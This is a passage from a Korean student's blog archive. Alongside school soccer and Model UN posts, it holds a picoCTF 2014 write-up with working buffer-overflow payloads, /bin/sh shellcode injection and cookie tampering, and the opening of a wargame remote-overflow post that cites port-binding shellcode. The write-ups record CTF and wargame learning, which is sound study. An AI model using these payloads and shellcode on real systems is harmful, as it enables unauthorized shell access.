Neko


'~ 2015'에 해당되는 글 65건

  1. 2016.02.16 축구 컨퍼런스
  2. 2015.10.30 AUDMUN2015 후기 [LIVE]
  3. 2015.09.22 Bufferoverflow 기법 정리
  4. 2015.09.05 핸드레이
  5. 2014.11.19 picoctf 2014 (6)
  6. 2014.11.01 DAAMUN 1- United Kingdom
  7. 2014.07.31 xavius->death_knight
  8. 2014.07.22 nightmare->xavius
  9. 2014.07.22 strace, 제가 한번 사용해 보겠습니다.
  10. 2014.07.10 succubus->nightmare

 


검색유입 받기 싫어서 컨퍼런스 이름은 안쓸건데, 어쨋든 동영상에 써있따. 보면 달려가서 태클거는게 난데, 캐스터가 잘했다고 칭찬해줌. 시즌내내 주전 못하다가 컨퍼런스 하기 1주전쯤 주전으로 뛰게됨. 
작년에는 태클 잘못걸었다가 노란카드받은기억이ㅋ ㅋㅋ ㅋ 

이 컨퍼런스 3일? 4일 전에 발목삐어서 컨디션 안좋았는데, 테이프 칭칭 감고 3일 풀로 뛰었다. 그래서 상태가 나빠진건 뻔하지만 뭐 이제 축구할일도 없을거니까 상관없는듯. 그래도 많이 나아서 평범한 사람같이 걸을수는 있음 -_- 내년엔 또 인도간댄다. 작년에도 인도갔는데...... 어쨋든 재미있었음




'~ 2015 > 학교뻘글' 카테고리의 다른 글

축구 컨퍼런스  (0) 2016.02.16
AUDMUN2015 후기 [LIVE]  (0) 2015.10.30
DAAMUN 1- United Kingdom  (0) 2014.11.01
[영어]To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[불어]Reflexive verbs  (0) 2013.12.11
[과학]The effect of salt on ice lab report  (0) 2013.12.02
Posted by 에버토끼

MUN 형식이 많이 달라서 당황했다. 전에 간 MUN들이랑 형식 자체가 달랐는데 그래도 회장들이 친절해서 괜찮았따.

미국을 맡았는데 책임이 엄청나드라.


그래서 아무 때나 lobbying이 가능했는데 (motion을 내면 거의 다 패스되었다) 그 시간동안 쓰라는 resolution은 쓰지도 않고 나라끼리 하도 싸워대서 진이 다 빠졌다. 진심 싸우는데 상대방이 말이 안통하면 답이 없습니다.


결국에 resolution은 나랑 일본이랑 쓴거 짬뽕하고 다른애들은 쓰지도 않았다.

약간 허술해서 놀랍다. 왔던 MUN중 발표는 많이 해서 좋은데 애들이 허술한 것 같다.


[LIVE]

4:39 PM

Session 3중이다.

Resolution 1 하는 중이다.


Resolution이 뭔소린지 1도 모르겠다. 지금 나가서 반대 의견 발표하고 왔는데 발표하면서도 resolution이 뭔소리하는지 모르겠어서 걍 약해보이는 곳을 공격했따. 근데 reso를 쓴 애들을 빼고 나머지 애들도 다 뭔소린지 1도 모르는것 같다. 재밌군 후후...


4:46 얘들아 왜그래 이건 amendment로도 고칠 수 없는 것 같아 그냥 넘어가면 안되겠니...?

4:58 열심히 amend하는중인데 나아진점은 딱히 없음. 발판이 된 아이디어 자체가 서로 반박하는 논리라서 말이 안됨. 아 진짜 걍빨리끝냈으면


6:19 간식먹고왔다 reso1은 통과 못했따. reso2도 똑같다. 우리것만 통과할듯.


레조 첨부함니다 우리 꽤 잘함.


Resolution.pdf


후기: reso 1이랑 2 둘다 못통과해서 합친거는 통과했는데 우리껀 통과 못했다. 프랑스가 끝까지 자유무역을 거부하고(...?) 라틴아메리카 나라들이 통수를 쳤따. 중국은 나쁘다. 2표? 차이로 통과못했따


후,....


'~ 2015 > 학교뻘글' 카테고리의 다른 글

축구 컨퍼런스  (0) 2016.02.16
AUDMUN2015 후기 [LIVE]  (0) 2015.10.30
DAAMUN 1- United Kingdom  (0) 2014.11.01
[영어]To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[불어]Reflexive verbs  (0) 2013.12.11
[과학]The effect of salt on ice lab report  (0) 2013.12.02
Posted by 에버토끼

https://docs.google.com/document/d/15d3f0ZEKxYXsrUNybTQlONGyxY9MVhb8NgDJAPNRCkU/edit?usp=drive_web


나름 공들여서 썼었던 기억이 난다. 기말고사 기간동안...

'~ 2015 > 컴퓨터공부' 카테고리의 다른 글

Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
Buffer Overflow  (3) 2014.05.18
Frame Pointer Overwrite/One Byte Overflow  (5) 2014.04.06
MISCCCCCCCCCC!  (0) 2014.03.11
Posted by 에버토끼


작년에 한동안 학교다니면서 짬짬히 했었던거. 쏟은 시간에 비해 결과물은 비루하다. 오랜만에 파일정리하고있었는데 나오드라. 나중에 시간되면 갖고있는 나머지도 다 해봐야될듯. 근데 이거 두 개 하고서는 꽤나 어셈에 대한 두려움이 없어져갖고 신기했었다. 뭐든지 다 읽을 수 있는기분ㅋ 

요즘은.. 어셈보면.. 심란하다...


그리고 누누히 말하지만 나는 포인터들이 싫다. (정색)


re(完).docx

re3(完).docx






'~ 2015 > 컴퓨터공부' 카테고리의 다른 글

Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
Buffer Overflow  (3) 2014.05.18
Frame Pointer Overwrite/One Byte Overflow  (5) 2014.04.06
MISCCCCCCCCCC!  (0) 2014.03.11
Posted by 에버토끼

Hello! Today I'm going to write simple writeups(without reasonings) to wrap-up what I've solved in the picoctf2014. Please feel free to ask questions for specific problems/reasonings in the comments(press "댓글 0개가 달렸습니다." which is at the end of this post in order to write comments)! Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

Chrome right click, click inspect element;

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and put in for keyword, 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Plug in a few cve's; CVE-2014-1542


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript

click break code! after entering the message.


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, go to inspect elements, open tab on the gridded bit of the website         -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to google images and paste the image's url, hit enter. The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
0x52657663 & 0x30646521 in little endian-" \x63\x76\x65\x52 & \x21\x65\x64\x30". Plug the values into 'data preview' below; \x63\x76\x65\x52\x21\x65\x64\x30; You get the values in ASCII. cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symbolic link the txt file into cow file.


pico19855@shell:~$ cd /home/daedalus

pico19855@shell:/home/daedalus$ ls

flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c

pico19855@shell:/home/daedalus$ ./supercow secret1.cow

 ____________

< cow_text_1 >

 ------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||

pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow

pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow

 ______________

< I_LOV_BNANAS >

 --------------

        \   ^__^

         \  (oo)\_______

            (__)\       )\/\

                ||----w |

                ||     ||


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.

Grep it.


pico19855@shell:/home/daedalus$ cd /problems/grepfriend

pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *

daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6

pico19855@shell:/problems/grepfriend$ 



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

alert(key); on your javascript console. (The key differs.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If an integer overflows, it becomes negative.


pico19855@shell:~$ nc vuln2014.picoctf.com 50000

Your number is 1712058. Can you make it negative by adding a positive integer?

2145771590

Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!


Thanks for playing.



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>


unsigned secret = 0xdeadbeef;


int main(int argc, char **argv){

    unsigned *ptr;

    unsigned value;


    char key[33];

    FILE *f;


    printf("Welcome! I will grant you one arbitrary write!\n");

    printf("Where do you want to write to? ");

    scanf("%p", &ptr);

    printf("Okay! What do you want to write there? ");

    scanf("%p", (void **)&value);


    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);

    *ptr = value;

    printf("Value written!\n");


    if (secret == 0x1337beef){

        printf("Woah! You changed my secret!\n");

        printf("I guess this means you get a flag now...\n");


        f = fopen("flag.txt", "r");

        fgets(key, 32, f);

        fclose(f);

        puts(key);


        exit(0);

    }


    printf("My secret is still safe! Sorry.\n");

}

pico19855@shell:/home/write_right$ gdb -q write_right

Reading symbols from write_right...(no debugging symbols found)...done.

(gdb) disas main

Dump of assembler code for function main:

   0x080485cd <+0>: push   %ebp

<cont..>

   0x0804865b <+142>: movl   $0x8048831,(%esp)

   0x08048662 <+149>: call   0x8048470 <puts@plt>

   0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.

   0x0804866c <+159>: cmp    $0x1337beef,%eax

<cont...>

   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>

   0x08048701 <+308>: leave  

   0x08048702 <+309>: ret    

End of assembler dump.

(gdb) x/wx 0x804a03c

0x804a03c <secret>: 0xdeadbeef

(gdb) q

pico19855@shell:/home/write_right$ ./write_right 

Welcome! I will grant you one arbitrary write!

Where do you want to write to? 0x804a03c

Okay! What do you want to write there? 1337beef

Writing 0x1337beef to 0x804a03c...

Value written!

Woah! You changed my secret!

I guess this means you get a flag now...

arbitrary_write_is_always_right

pico19855@shell:/home/write_right$ 



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
void give_shell(){
 gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh -i"); 
}

void vuln(char *input){
char buf[16];
int secret = 0;
strcpy(buf, input);

if (secret == 0xc0deface){
give_shell(); 
}else{
printf("The secret is %x\n", secret); 
}
 

int main(int argc, char **argv){
if (argc > 1)
vuln(argv[1]);
return 0;
}

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl
-e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
You see the url of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python

import sys """ Daedalus Corporation encryption script. """ def xor(input_data, key): result = "" for ch in input_data: result += chr(ord(ch) ^ key) return result def encrypt(input_data, password): key = 0 for ch in password: key ^= ((2 * ord(ch) + 3) & 0xff) return xor(input_data, key) def decrypt(input_data, password): return encrypt(input_data, password) def usage(): print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0]) exit() def main(): if len(sys.argv) < 5: usage() input_data = open(sys.argv[2], 'r').read() result_data = "" if sys.argv[1] == "encrypt": result_data = encrypt(input_data, sys.argv[4]) elif sys.argv[1] == "decrypt": result_data = decrypt(input_data, sys.argv[4]) else: usage() out_file = open(sys.argv[3], 'w') out_file.write(result_data) out_file.close()  

main()

//Actually, I kinda got mixed here, so (i dont remember his name) thanks to the anonymous admin who made this prob. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'


password=[]


def xor(input_data, key):

    result = ""

    for ch in input_data:

        result += chr(ord(ch) ^ key)

    return result


for password in range (0,256):

   result=xor(input_data, password)

   print result + "\n"


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why at&t
I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt
# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm

# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.

MOV $3187,%ebx //ebx=3187 MOV $26953,%eax //eax=26953 MOV $19902,%ecx //ecx=19902 CMP %eax,%ebx //compare eax and ebx JL L1 //Jump to L1 if ebx < eax JMP L2 //else jump to L2

L1: IMUL %eax,%ebx //ebx=eax*ebx, ebx=8539211 ADD %eax,%ebx //ebx+=eax, ebx=85926164 MOV %ebx,%eax //eax=ebx, eax=85926164 SUB %ecx,%eax //eax-=ecx, goto L3, eax=85906262 JMP L3

L2: IMUL %eax,%ebx //ebx=eax*ebx SUB %eax,%ebx //ebx+=eax MOV %ebx,%eax //eax=ebx ADD %ecx,%eax //eax-=ecx

L3: 

NOP



Delicious! - 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension, EditThisCookie. In the cookie value <session_id> is your session stored. Change it to numbers 1~50 (50, I'd recommend,) and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symb
ols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <gi
ve_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl
-e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great             




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memories of solving this (I remember asking about it tho,) I think I had used a more "professional" way when I first solved it but since the password is hardcoded(the hint) I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
______  
_ _ _____
| _ \ | | | | / __ \
| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \
| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) |
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/
| |
|_|
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at/home/no_overflow/ on the shell server. The source can be found here.

How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)


The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.

Don't forget to ulimit -c unlimit in order to make a core file.

pico19855@shell:~$ cat no_overflow.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256
void greet(int length){
char buf[BUFSIZE];
puts("What is your name?");
read(0, buf, length);
printf("Hello, %s\n!", buf);
}
void be_nice_to_people(){
gid_t gid = getegid();
setresgid(gid, gid, gid);
}
int main(int argc, char **argv){
int length;
be_nice_to_people();
puts("How long is your name?");
scanf("%d", &length);
if(length < BUFSIZE) //don't allow buffer overflow
greet(length);
else
puts("Length was too long!");
}

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                                                                    €莽咽œ昶苔ƒ嚆

 

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb) 

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734


0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a

(gdb) q


pico19855@shell:~$ cd /home/no_overflow

pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                       €莽擎|昶苔ƒ嚆

ls

Makefile  core flag.txt  no_overflow  no_overflow.c

cat flag.txt

what_is_your_sign


'~ 2015 > 대회풀이' 카테고리의 다른 글

picoctf 2014  (6) 2014.11.19
picoCTF 2013  (0) 2014.06.27
[CodeGate Junior Quals] RunCommand 250  (0) 2014.04.06
Posted by 에버토끼

올해 DAA 에서 열린 모의유엔에 냈던 country report, position paper(policy statement), resolution입니다.

ECOSOC, UK로 참가했으며, 주제는 Measures to ensure gender equilty in the MENA region과 The question of food and water security in the MENA region이었습니다. 학교에서 조촐하게 하는거라 조사도 많이 안하고 준비도 제대로 안해서 개인 resolution은 없습니다.ㅋㅋ 저 혼자만의 결과물이 아니기 때문에 그냥 참고만 하시기 바랍니다.



ECOSOC-GenderEquality-UK_PositionPaper.docx


Food and Water Scarcity-Resolutions.docx


Gender equity measures-Resolution Qatar, Saudi Arabia, Egypt.doc


GenderEquality-Resolutions.docx


UK_CountryReport.docx


Water and Food UK Saudi Arabia Turkey Singapore.docx





'~ 2015 > 학교뻘글' 카테고리의 다른 글

축구 컨퍼런스  (0) 2016.02.16
AUDMUN2015 후기 [LIVE]  (0) 2015.10.30
DAAMUN 1- United Kingdom  (0) 2014.11.01
[영어]To Kill a Mockingbird Formative Essay  (0) 2014.04.01
[불어]Reflexive verbs  (0) 2013.12.11
[과학]The effect of salt on ice lab report  (0) 2013.12.02
Posted by 에버토끼

이번에 좀 머리를 쓰긴 했지만 원래 소켓프로그래밍 정말로 해보고싶었던지라 재밌게 클리어 한 것 같습니다.

처음에 제 생각으론 쉘이 따져야할텐데 안 따져서 인터넷을 좀 뒤져봤더니 권한을 어.. 뭐라해야하지 연결한 프로그램한테 바로 주는 것이 아니라 다른 포트에 연결해놔서 listen하고 있게 둔 다음 그 포트로 접속해야 연결이 되게 만든 쉘코드가 바로 port binding shellcode이라네요. 스택 오버플로우에 비슷한 질문이 올라와있어서 포트바인딩 쉘코드를 사용해야 한다는걸 알게 되었습니다. 쉘코드는 http://shell-storm.org/shellcode/files/shellcode-217.php 이곳에서 찾았습니다.



[xavius@localhost xavius]$ cat death_knight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark knight

        - remote BOF

*/


#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <dumpcode.h>


main()

{

        char buffer[40];


        int server_fd, client_fd;

        struct sockaddr_in server_addr;

        struct sockaddr_in client_addr;

        int sin_size;


        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

                perror("socket");

                exit(1);

        }


        server_addr.sin_family = AF_INET;

        server_addr.sin_port = htons(6666);

        server_addr.sin_addr.s_addr = INADDR_ANY;

        bzero(&(server_addr.sin_zero), 8);


        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

                perror("bind");

                exit(1);

        }


        if(listen(server_fd, 10) == -1){

                perror("listen");

                exit(1);

        }


        while(1) {

                sin_size = sizeof(struct sockaddr_in);

                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

                        perror("accept");

                        continue;

                }


                if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }


                close(client_fd);

                while(waitpid(-1,NULL,WNOHANG) > 0);

        }

        close(server_fd);

}

복잡한 코드엔 쥐약인데 보자마자 복잡해 보였습니다ㅋㅋ.... 프로그래밍 공부좀 열심히 해야겠습니다. 

일단 저는 클리어에 목표를 두었기 때문에 perror, 즉 에러메세지를 프린트해주는 부분은 건너뛰었습니다. 그 위의 소스도 소켓을 연결하는 부분이고요.


그렇다면 봐야할 곳은 여기인데

 if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

